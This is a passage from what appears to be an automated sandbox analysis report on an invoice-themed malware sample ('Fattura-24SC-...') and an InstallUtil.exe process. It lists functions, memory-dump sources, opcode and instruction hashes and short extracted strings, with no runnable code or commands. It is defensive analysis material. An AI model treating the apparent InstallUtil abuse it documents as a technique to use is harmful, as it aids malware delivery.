Opcode Fuzzy Hash: 01dc0c37abb6a964d4278eeb9bf324d4cd55f3dfa22646675628c4b8e8e8f88e
Instruction Fuzzy Hash: 09E01235D09208EBC714EFA8E545A6DBBB8EB45305F20D19DCC0827345CA319E42DFC1

Function 0A35B698 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167a2e2c40ffcccdec65a3f691321351ec0bc9596046d7d9468cec263333f9b4
Instruction ID: 41164c66c7ab77b261b569009043de2bc2388ad2db1835b3fe5524f7d523d208
Opcode Fuzzy Hash: 167a2e2c40ffcccdec65a3f691321351ec0bc9596046d7d9468cec263333f9b4
Instruction Fuzzy Hash: DBE0C27180130CEFCB00FFF4D504A9EB3F89B44201F0045A5C50893110EE314A00ABE2

Function 02F9E9B0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4528b7e14b7352ef597d9d5521ef64434140f65f9f95d37490e000fe3d9465
Instruction ID: e3c783e8ad37a217701a546658cf547107e3c42732a19771f1e40b5c85b6aecd
Opcode Fuzzy Hash: 4b4528b7e14b7352ef597d9d5521ef64434140f65f9f95d37490e000fe3d9465
Instruction Fuzzy Hash: 43D05EB4E1220CFFCB00DFB8E9015ADBBF9EF45615B1085E9D808E7201EA316F019B91

Function 0A35E630 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 738501fe80bed6698205b0ae368fa47af464392e0bb07fc755f8baf5a3e02f90
Instruction ID: ff3e85034dac3e11dba93e455e50105c04e6a551c02f3455e657dd75c8ba4ddb
Opcode Fuzzy Hash: 738501fe80bed6698205b0ae368fa47af464392e0bb07fc755f8baf5a3e02f90
Instruction Fuzzy Hash: 46C02B3304A7048BD160227DA08EB7233EDDB06307F045400880C0141346E44410CED5

Function 02F9C4F5 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b9832ffb6238501587a47aaf415992641ebaf2edcc19a44cd6b9615704e2ccc
Instruction ID: 21befee902bdd89b1262e57c7450fb29bbf9e0badaddaa467e8ed75381f0f69a
Opcode Fuzzy Hash: 7b9832ffb6238501587a47aaf415992641ebaf2edcc19a44cd6b9615704e2ccc
Instruction Fuzzy Hash: 66C08C30F021289BEF109758D810B7C29AAAF40B84F84019AEA03AB390C8B45E418FC9

Function 02F99550 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c3a9feabf78d0de07fd34b64d6772740af33116ba9c5913edad7e87ed14ab4
Instruction ID: b8020478162f41150a919be08b714ad8ec97938ffc7c88ce9dbff47077111fd5
Opcode Fuzzy Hash: d7c3a9feabf78d0de07fd34b64d6772740af33116ba9c5913edad7e87ed14ab4
Instruction Fuzzy Hash: 91C048A804F3C82ED3078238AC1CCA37FAC5C8316038A00CAA080EF063D0489A8893B3

Function 02F99B30 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b863bb421ea5b267d8dcc1be6673c5ea547f43eff573f7777a857b6f72cdcef
Instruction ID: de7cf81e9007f3fa743f7bc8423d452b42b8e76ef26909080207979ab2065b91
Opcode Fuzzy Hash: 4b863bb421ea5b267d8dcc1be6673c5ea547f43eff573f7777a857b6f72cdcef
Instruction Fuzzy Hash: 29C04C2080A3C98FCF464778986D5027F749D4330071740E6D081DB077D228555DCB22

Non-executed Functions

Function 0A032CA0 Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

oviders = $request.SelectProvidersWithFeature($script:SupportsPSModulesFeatureName) foreach($provider in $modul, xrefs: 0A0332F9

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: oviders = $request.SelectProvidersWithFeature($script:SupportsPSModulesFeatureName) foreach($provider in $modul
API String ID: 0-63563998
Opcode ID: 5c5123941d3f3e4fd6f746ef45859aa251dd711cf16a1d7caa6a43160d973590
Instruction ID: 9221be03f784792cb2ac5e3b9a6b8d72afd462716de9512b7e905ec5a4a0a629
Opcode Fuzzy Hash: 5c5123941d3f3e4fd6f746ef45859aa251dd711cf16a1d7caa6a43160d973590
Instruction Fuzzy Hash: 4E311C71E1021CDFDB58CF6AD9557EEBBFAAB88300F10C0AAD909A7350DB7459468F41

Function 02F9EDE8 Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1375905980.0000000002F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2f90000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1fd8386820bf00461c2616eb81250641be9a1500832428adeac6528b627c269
Instruction ID: 49e729857660cba4a9a9e3b8a33fc13b4c790c9a57ccae8312a2f4f7b8ddb7e5
Opcode Fuzzy Hash: e1fd8386820bf00461c2616eb81250641be9a1500832428adeac6528b627c269
Instruction Fuzzy Hash: 82915B31F04208CFEF14DB69C488BAAB7B7EB88341F5AC966D2159B645C774E885CF90

Function 0A35E288 Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b8b6505760d3ca6943c8f74f794f5731e4695108f11a6b11ddd8e152da8295b
Instruction ID: 27d0bfc29b07a552f6d63c14368f9c289c28f88c88f9bacbb10b31f254954aca
Opcode Fuzzy Hash: 2b8b6505760d3ca6943c8f74f794f5731e4695108f11a6b11ddd8e152da8295b
Instruction Fuzzy Hash: 18813874D05328CFDB24DFB9C844BADBBB6BF49300F2480A9D909A7641DB749A85CF41

Function 0A0E0006 Relevance: .2, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7eccba3ac06dcc008af9b316476f8bdccfbd4bc7921a488f3840a7e4515fa2cc
Instruction ID: d21eaecbfa220180e5c11f7b4ade5dd15e46f4af67468d31d50264256eda935a
Opcode Fuzzy Hash: 7eccba3ac06dcc008af9b316476f8bdccfbd4bc7921a488f3840a7e4515fa2cc
Instruction Fuzzy Hash: 3381CAB1D056948FEB29CF2B9C846D5BFB3AFCA310F18C4EA94486B115D7720A85DF41

Function 0A0E0040 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d393827318419218261682d37fb331d0eb3e70bad5a36a3c661d67505e39199
Instruction ID: 3f7a80cc62a42c0fbb237ae088d581d89d8e2c83513cce0d7a058317c956f2e6
Opcode Fuzzy Hash: 0d393827318419218261682d37fb331d0eb3e70bad5a36a3c661d67505e39199
Instruction Fuzzy Hash: 1D514A71D056698BEB6CCF6B8D446CAFAF3AFC9300F14C1FA854CAA254DB704AC58E40

Function 0A0ED8F8 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423528202.000000000A0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A0E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a0e0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6ad7a95d50f9d408d6c5b9d916c9e67f7443a5e10e875bfa0406009f9cb1434
Instruction ID: 5791ef688069c885c4152a9948c88f0724c23671574408f2691bc9679fa7f1e1
Opcode Fuzzy Hash: d6ad7a95d50f9d408d6c5b9d916c9e67f7443a5e10e875bfa0406009f9cb1434
Instruction Fuzzy Hash: D541ECB5D1434C9FDB14CFA9D985BAEBBF1FB49300F24902AE824AB250D7789984CF45

Function 0A340040 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97b4bdd0bb88494109810a344f865c36b01dbf86b94a6bab70bf5a30f876ca57
Instruction ID: 6b851a00b101e54cb24983149f2e80878cbb5230badd2e1a409541bc7c99a5e0
Opcode Fuzzy Hash: 97b4bdd0bb88494109810a344f865c36b01dbf86b94a6bab70bf5a30f876ca57
Instruction Fuzzy Hash: 93411B74D05628CBEB28CF2ACD48799FBF6AB89304F01C1EA940CA7615DB741AC5CF01

Function 0A0386F9 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e37a427225192d7e4a3638a08a74ffa149facdf8403ce672d93ce65214556a2
Instruction ID: 734b29fe810d008853e9d6ef7122eccd4b68be508d635d72acf2311c19bf9fc7
Opcode Fuzzy Hash: 4e37a427225192d7e4a3638a08a74ffa149facdf8403ce672d93ce65214556a2
Instruction Fuzzy Hash: 5441FEB5D05258DFDB10CFA9D580AEEFBF0AF49310F14846AE455B7240C778AA49CF68

Function 0A038700 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f42ad8bfda797c2b3c7d89d4f5ec10672061398e6f3fcfd6e244d9c3e15adbd1
Instruction ID: dd6c219befef23d038e12e84d485d68b120fdceeb977678336cf70604328d0a1
Opcode Fuzzy Hash: f42ad8bfda797c2b3c7d89d4f5ec10672061398e6f3fcfd6e244d9c3e15adbd1
Instruction Fuzzy Hash: F541FEB5C05258DFCB10CFA9D580AEEFBF4AB09310F14806AE414B7240C778AA49CF68

Function 0A340006 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423807010.000000000A340000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A340000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a340000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ab8e75deebaa8df39ad5de501788f548fcd11711a57a36c4e514b0c58862aa0
Instruction ID: 94a6e3cd75d70dc128450131f1838f35ada92ed08613326d5ae193a68028b1c8
Opcode Fuzzy Hash: 8ab8e75deebaa8df39ad5de501788f548fcd11711a57a36c4e514b0c58862aa0
Instruction Fuzzy Hash: 3E31EC71D057549FEB29CF6B8C4468ABBF6BF8A300F05C1EAD408AB125DB741986CF50

Function 0A033A68 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94c8e2c661d035da279c0291e33968aca0821ff4db5d3105177254d071739681
Instruction ID: 5220cd35ea8ce484be0155fdb835fa756ff847c61235f44f79e3d955c563fbba
Opcode Fuzzy Hash: 94c8e2c661d035da279c0291e33968aca0821ff4db5d3105177254d071739681
Instruction Fuzzy Hash: CC21F0B5D152189FDB14CFA9D980AEEFBF4BB49310F14905AE805B7250C7356901CFA9

Function 0A033A70 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.1423104364.000000000A030000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A030000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_a030000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f843af43a45428e1f97c43132e88f760a3a6eb8fc4b02ef0b4de0271d9f4549
Instruction ID: d049675fcb68fada1cc1dfd4f10b39c1c3b75eb12f83da3602412f7b29de0dbf
Opcode Fuzzy Hash: 6f843af43a45428e1f97c43132e88f760a3a6eb8fc4b02ef0b4de0271d9f4549
Instruction Fuzzy Hash: 6721CFB6D152189FDB14CFA9D980AEEFBF4BB49310F14901AE815B7210C7356901CFA9

Function 076D1AAD Relevance: 6.4, Strings: 5, Instructions: 119COMMON

Download Yara Rule

Strings

Teq, xrefs: 076D1B65
Teq, xrefs: 076D1B71
4'q, xrefs: 076D1B89
4'q, xrefs: 076D1B95
Teq, xrefs: 076D1B26

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q$Teq$Teq$Teq
API String ID: 0-767899262
Opcode ID: ef33c59123009efb5256081eb727170326e726f9237a3e17c2262b5d4794c0b4
Instruction ID: e1619aa747364e25c147d63168792fa7c67876271f1c3fbb1a13f2b5188e5f9c
Opcode Fuzzy Hash: ef33c59123009efb5256081eb727170326e726f9237a3e17c2262b5d4794c0b4
Instruction Fuzzy Hash: C73137F5F2420A8BEB28567498503BAB7929B87210B19407BD403CB392FEB5CC52C762

Function 076D0978 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4'q, xrefs: 076D09EF
4'q, xrefs: 076D09E3
$q, xrefs: 076D09C2
$q, xrefs: 076D09CE

Memory Dump Source

Source File: 00000007.00000002.1409226714.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_76d0000_Fattura-24SC-99245969925904728562.jbxd

Similarity

API ID:
String ID: 4'q$4'q$$q$$q
API String ID: 0-3199993180
Opcode ID: 04f81fe64a88dbb108cbbee3cda248550bd20281ea51ec2d959f2f834f96fee6
Instruction ID: fcdc357f0550e13e8ecb1b1cd89128d7eef7e3971a4901c5ce675b6769b482a4
Opcode Fuzzy Hash: 04f81fe64a88dbb108cbbee3cda248550bd20281ea51ec2d959f2f834f96fee6
Instruction Fuzzy Hash: E4018461B1A3C74FE72A127928202A56FB35FC351071A51E7E582DF2A3C9548D06C376

Analysis Process: InstallUtil.exePID: 7928, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.6%
Total number of Nodes:	167
Total number of Limit Nodes:	20

Executed Functions

Function 04C37C5F Relevance: 16.1, Strings: 12, Instructions: 1144COMMON

Download Yara Rule

Strings

$q, xrefs: 04C38167
$q, xrefs: 04C380C7
,q, xrefs: 04C3872A
$q, xrefs: 04C37F03
4, xrefs: 04C38645
$q, xrefs: 04C38551
$q, xrefs: 04C3859A
$q, xrefs: 04C385AA
$q, xrefs: 04C37EF3
$q, xrefs: 04C380B7
$q, xrefs: 04C38177
$q, xrefs: 04C38541

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-2072453518
Opcode ID: d4068a2f24613b72c635aec23221064dae39fbe02eb0d5977568e4fbcf456ea5
Instruction ID: dc5e254cf5fba8b3fc12d6ceddec5b2b2c2a4204b06252003438fda6ab1dac2f
Opcode Fuzzy Hash: d4068a2f24613b72c635aec23221064dae39fbe02eb0d5977568e4fbcf456ea5
Instruction Fuzzy Hash: EEB20674A002288FDB24DFA5C894BADB7F6BF88301F158599E505AB3A4DB70ED45CF60

Function 04C37F97 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

$q, xrefs: 04C38167
,q, xrefs: 04C3872A
4, xrefs: 04C38645
$q, xrefs: 04C3859A
$q, xrefs: 04C380B7
$q, xrefs: 04C38541

Memory Dump Source

Source File: 00000009.00000002.1492938579.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c30000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,q$4$$q$$q$$q$$q
API String ID: 0-3956183810
Opcode ID: 97b8fc322d598f8dfb93af9b8ae0bf33fb0a94f0425108a53a19927b35e1d210
Instruction ID: abb756d9237350f353b5bea3f019fa14f472b3bb745b25996aa00b876b0c7f50
Opcode Fuzzy Hash: 97b8fc322d598f8dfb93af9b8ae0bf33fb0a94f0425108a53a19927b35e1d210
Instruction Fuzzy Hash: B122EA74A00218CFDB24DF65C894BADB7F2BF88305F148599E509AB2A5DB70ED85CF60

Function 0552C0C8 Relevance: 5.7, Strings: 4, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TJq, xrefs: 0552C158
Teq, xrefs: 0552C3FB
xbq, xrefs: 0552C129
pq, xrefs: 0552C6F4

Memory Dump Source

Source File: 00000009.00000002.1510276933.0000000005520000.00000040.00000800.00020000.00000000.sdmp, Offset: 05520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5520000_InstallUtil.jbxd

Similarity

API ID:
String ID: TJq$Teq$pq$xbq
API String ID: 0-2466396065
Opcode ID: c2c60e43498b78b9878f97188f56461033f67b8d1062d2b5f45d6c00f5e69bee
Instruction ID: 80007a4e374e8c8778a6d6a5736cb53fb2e4bceeef9116216acd51ba94681d89
Opcode Fuzzy Hash: c2c60e43498b78b9878f97188f56461033f67b8d1062d2b5f45d6c00f5e69bee
Instruction Fuzzy Hash: 24524B75A00624AFDB55CF68C984EADBBB2FF49304F1581A8E509AB276CB31EC51DF40

Function 06752F8F Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

P^, xrefs: 067530CE
Xx/, xrefs: 067530D3

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: P^$Xx/
API String ID: 0-3322568364
Opcode ID: ad8f8822b2950fa944549120ae5388991b993bb08323d911a641f64610d21f17
Instruction ID: bcfb276ad71c0c34679901d8afea520173079fc59e9567e9592fd8115d80f3e6
Opcode Fuzzy Hash: ad8f8822b2950fa944549120ae5388991b993bb08323d911a641f64610d21f17
Instruction Fuzzy Hash: 5041A574A002189FDB98DFA9D859BADBBF5EB48340F5180A9E40ADB394DF346D41CF50

Function 04975B18 Relevance: 2.0, Strings: 1, Instructions: 755COMMON

Download Yara Rule

Strings

(q, xrefs: 04975E28

Memory Dump Source

Source File: 00000009.00000002.1491149297.0000000004970000.00000040.00000800.00020000.00000000.sdmp, Offset: 04970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4970000_InstallUtil.jbxd

Similarity

API ID:
String ID: (q
API String ID: 0-2414175341
Opcode ID: 3f87565f0a8c7af9273a5287e9ab11f65c593780c5d484a6e0825a8a86d92450
Instruction ID: 9203135f102bf3b669b94ff81a4d790464c8f907f73f15b9180a3f3bbec75e9c
Opcode Fuzzy Hash: 3f87565f0a8c7af9273a5287e9ab11f65c593780c5d484a6e0825a8a86d92450
Instruction Fuzzy Hash: 56528970B007169FDB55CF69C494A6EBBF2FF88310F248929E55AD7781DB30A906CB90

Function 0675E4C0 Relevance: 1.5, Strings: 1, Instructions: 288COMMON

Download Yara Rule

Strings

fq, xrefs: 0675E57B

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: fq
API String ID: 0-2523619172
Opcode ID: acc76fd9a4b6410f2cd1de6974fb1d288f2296a35e87d6d2d16ef0bad6547130
Instruction ID: 9d36c103af5326781217aec73d019b2420193e5b856ced26ac66c04d09d4aabf
Opcode Fuzzy Hash: acc76fd9a4b6410f2cd1de6974fb1d288f2296a35e87d6d2d16ef0bad6547130
Instruction Fuzzy Hash: 5BA17F30B002148FDB85EB75D9A566EB7E7EF88200B5580ADDC06D7398EE70AD02CB85

Function 067F6560 Relevance: 1.5, Strings: 1, Instructions: 277COMMON

Download Yara Rule

Strings

Teq, xrefs: 067F66F2

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: c5427bc5cd2bca864261cded02a5bf41ef3823869153343ea0d06baa80df79d2
Instruction ID: 0e03e97d322e4ecea5cc72e13a361c48643a38ab8bc265f6cb142f10fc4083b0
Opcode Fuzzy Hash: c5427bc5cd2bca864261cded02a5bf41ef3823869153343ea0d06baa80df79d2
Instruction Fuzzy Hash: 6BB15E34B102148FDB45EFA5D965A6EB7F2EF89300F65811DD906AB358EF70AC42CB81

Function 067F6D90 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

fq, xrefs: 067F6DCE

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: fq
API String ID: 0-2523619172
Opcode ID: 9a25f27fe92e434c1e3a07b47eff25e3b2031b8cfb7d10176ac45b6abe3f2d83
Instruction ID: 255a4fa674107e96223a1c4bb6ec924ca1ca3c45bddaa8aa083f9625f2bcd6ae
Opcode Fuzzy Hash: 9a25f27fe92e434c1e3a07b47eff25e3b2031b8cfb7d10176ac45b6abe3f2d83
Instruction Fuzzy Hash: 41A17030A002198FDB55EF65D855BAEB7B2FF88300F118199D909AB348DF70AD86CF91

Function 067F654F Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

Teq, xrefs: 067F66F2

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: Teq
API String ID: 0-1098410595
Opcode ID: fb4d9f3e5b98169ebf4a2e0763b68e8d4810704ca57959d1565457012e837a0c
Instruction ID: 90f06341ddaacd80a90c47e004fa421d69ccaaf3aa23e57ba205c741c710b4f1
Opcode Fuzzy Hash: fb4d9f3e5b98169ebf4a2e0763b68e8d4810704ca57959d1565457012e837a0c
Instruction Fuzzy Hash: 61A14034B102148FDB55EFA5D865A6EB7F2EF89300F65811DD906AB358EF70AC42CB81

Function 067F6D80 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

fq, xrefs: 067F6DCE

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: fq
API String ID: 0-2523619172
Opcode ID: 27657573010ca63236992668aa27b6e424f6be9e5da1251f610857efbb7bbbf6
Instruction ID: 1728ecb037a9609f6eaf37e229d8c0b53e07060c0c9d3c6aeb04a79aa673273a
Opcode Fuzzy Hash: 27657573010ca63236992668aa27b6e424f6be9e5da1251f610857efbb7bbbf6
Instruction Fuzzy Hash: B4A16030A002198FDB55EF65D855BAEB7B2FF88300F119199D909AB348DF70AD86CF91

Function 0675423C Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

PHq, xrefs: 067544D0

Memory Dump Source

Source File: 00000009.00000002.1522784487.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6750000_InstallUtil.jbxd

Similarity

API ID:
String ID: PHq
API String ID: 0-3820536768
Opcode ID: 19e70b7ca5ca26b5cb0ae8daf0d4a414a8d56335b30762490d954936b4e5dba1
Instruction ID: 1d52ed54969162cd6b62b12203c8de5f4c6ec8971aab072103adc149741efea3
Opcode Fuzzy Hash: 19e70b7ca5ca26b5cb0ae8daf0d4a414a8d56335b30762490d954936b4e5dba1
Instruction Fuzzy Hash: A5917F34B041148FE789EB65E4557AAB7F3EB84704F25C069E9069B38CDFB49C81CB91

Function 067F4978 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

KDBMZq, xrefs: 067F4AC4

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: KDBMZq
API String ID: 0-1462230996
Opcode ID: 1ca22e7d34deea832b05423c24807d8d5ff6462fb7dabb589c699db40e3a7be5
Instruction ID: 826cdff376743803a5c076f3229880f94eae2309ce9326e768634cb914dbb1a2
Opcode Fuzzy Hash: 1ca22e7d34deea832b05423c24807d8d5ff6462fb7dabb589c699db40e3a7be5
Instruction Fuzzy Hash: D4913675A101098FD744DF99E584AABF7F2FBC8300F60C12AE6069B349CB74AD51CB91

Function 067F1FD0 Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

~*Vk, xrefs: 067F2185

Memory Dump Source

Source File: 00000009.00000002.1523033917.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_67f0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ~*Vk
API String ID: 0-2852096391
Opcode ID: 3f41a46575c20fcbfc06a9e931cf8cc82f54f2aff7545295114a377c59a8bd9d
Instruction ID: 3b90711ac0e064bde3f6f82e2812a24f0e19d4b98690b60b1bdb4c02efb16b78
Opcode Fuzzy Hash: 3f41a46575c20fcbfc06a9e931cf8cc82f54f2aff7545295114a377c59a8bd9d
Instruction Fuzzy Hash: 08A12A74A10208CFEB45DFA5D459AADB7F1EB48300F10C06AD816AB3A5DF74A901CF51

Function 067F4969 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

